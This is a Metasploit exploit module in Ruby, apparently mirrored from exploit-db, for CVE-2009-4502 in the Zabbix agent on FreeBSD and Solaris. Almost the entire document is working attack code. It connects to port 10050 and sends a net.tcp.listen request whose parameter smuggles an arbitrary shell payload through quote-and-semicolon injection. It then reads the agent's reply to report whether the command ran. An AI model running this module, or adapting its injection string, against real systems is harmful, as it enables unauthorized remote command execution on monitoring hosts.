Zabbix Agent – ‘net.tcp.listen’ Command Injection (Metasploit)

  • 作者: Metasploit
    日期: 2010-07-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16918/
  • ##
    # $Id: zabbix_agent_exec.rb 9669 2010-07-03 03:13:45Z jduck $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = ExcellentRanking
    
    	include Msf::Exploit::Remote::Tcp
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Zabbix Agent net.tcp.listen Command Injection',
    			'Description'=> %q{
    					This module exploits a metacharacter injection vulnerability
    				in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
    				can only be exploited if the attacker can hijack the IP address
    				of an authorized server (as defined in the configuration file).
    			},
    			'Author' => [ 'hdm' ],
    			'License'=> MSF_LICENSE,
    			'Version'=> '$Revision: 9669 $',
    			'References' =>
    				[
    					[ 'CVE', '2009-4502' ],
    					[ 'OSVDB', '60956' ],
    					[ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
    				],
    			'Platform' => ['unix'],
    			'Arch' => ARCH_CMD,
    			'Privileged' => false,
    			'Payload'=>
    				{
    					'BadChars'=> "'",
    					'Space' => 1024,
    					'DisableNops' => true,
    					'Compat'=>
    						{
    							'PayloadType' => 'cmd',
    							'RequiredCmd' => 'generic perl telnet',
    						}
    				},
    			'Targets'=>
    				[
    					[ 'Automatic Target', { }]
    				],
    			'DefaultTarget'=> 0,
    			'DisclosureDate' => 'Sep 10 2009'))
    
    		register_options(
    			[
    				Opt::RPORT(10050)
    			], self.class)
    	end
    
    	def exploit
    		connect
    
    		rnd_port = rand(1024) + 1
    		buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"
    
    		print_status("Sending net.tcp.listen() request to the zabbix agent...")
    		sock.put(buf)
    
    		res = nil
    		begin
    			res = sock.get_once(-1, 5)
    		rescue ::EOFError
    		end
    
    		if ! res
    			print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.")
    			disconnect
    			return
    		end
    
    		if (res =~ /ZBX_NOTSUPPORTED/)
    			print_status("The zabbix agent is not running a vulnerable version or operating system.")
    			disconnect
    			return
    		end
    
    		if(res !~ /ZBXD/)
    			print_status("The zabbix agent returned an unknown response.")
    			disconnect
    			return
    		end
    
    		print_status("The zabbix agent should have executed our command.")
    		disconnect
    	end
    
    end